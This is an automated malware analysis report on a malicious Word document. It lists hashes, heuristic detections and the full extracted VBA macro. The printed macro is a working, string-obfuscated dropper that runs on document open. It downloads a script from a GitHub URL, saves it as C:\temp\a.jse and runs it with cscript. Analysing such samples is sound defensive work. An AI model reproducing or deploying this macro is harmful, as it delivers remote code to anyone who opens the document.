Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3ae2104db331ee4c…

MALICIOUS

Office (OOXML)

17.1 KB Created: 2020-12-03 18:43:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-03-31
MD5: c1fdef6998a470d8966bbc567ea66251 SHA-1: f195adcb333af9b7fbfbd1a855de7c513d32f8f6 SHA-256: 3ae2104db331ee4cf67abe0c92444dfbbc3dc8eca9cfbecfe61b70bebaf03434
250 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        a = Shell("Cm" & "D" & " /" & "c csc" & "RIp" & "t c:\" & "te" & "mp\" & "a.j" & "se")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        o.Write r.responseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        a = Shell("Cm" & "D" & " /" & "c csc" & "RIp" & "t c:\" & "te" & "mp\" & "a.j" & "se")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set r = CreateObject("Micr" & "osof" & "t.X" & "MLH" & "TTP")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1264 bytes
SHA-256: fd33450454b657f6e4295242448bf12823cdd1de553c6629f134c09345fd6d04
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
    'Open "C:\temp\a.jse" For Output As #1
    '    Print #1, "va" & "r s" & " = n" & "ew Ac" & "tiveX" & "Obje" & "ct(" & Chr(34) & "WSc" & "rip" & "t.She" & "ll" & Chr(34); ");"
    '    Print #1, "s.P" & "op" & "up(" & Chr(34) & "hi" & Chr(34) & ");"
    'Close #1
    Call df
    a = Shell("Cm" & "D" & " /" & "c csc" & "RIp" & "t c:\" & "te" & "mp\" & "a.j" & "se")
End Sub


Sub df()
    Dim u As String
    u = "ht" & "tps:/" & "/raw." & "gith" & "ubu" & "ser" & "cont" & "ent." & "com" & "/bt" & "efx" & "/h" & "uehu" & "e/ma" & "st" & "er/a"
    
    Dim r As Object
    Set r = CreateObject("Micr" & "osof" & "t.X" & "MLH" & "TTP")
    r.Open "GET", u, False, "username", "password"
    r.send
    
    Set o = CreateObject("A" & "DOD" & "B." & "Str" & "eam")
    o.Open
    o.Type = 1
    o.Write r.responseBody
    o.SaveToFile "C:\tem" & "p\a.j" & "se", 2 ' 1 = no overwrite, 2 = overwrite
    o.Close
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9216 bytes
SHA-256: 03f4f7bebe9a22bac245df091be2a57d5af4aa838b290aa63355315162d7a56c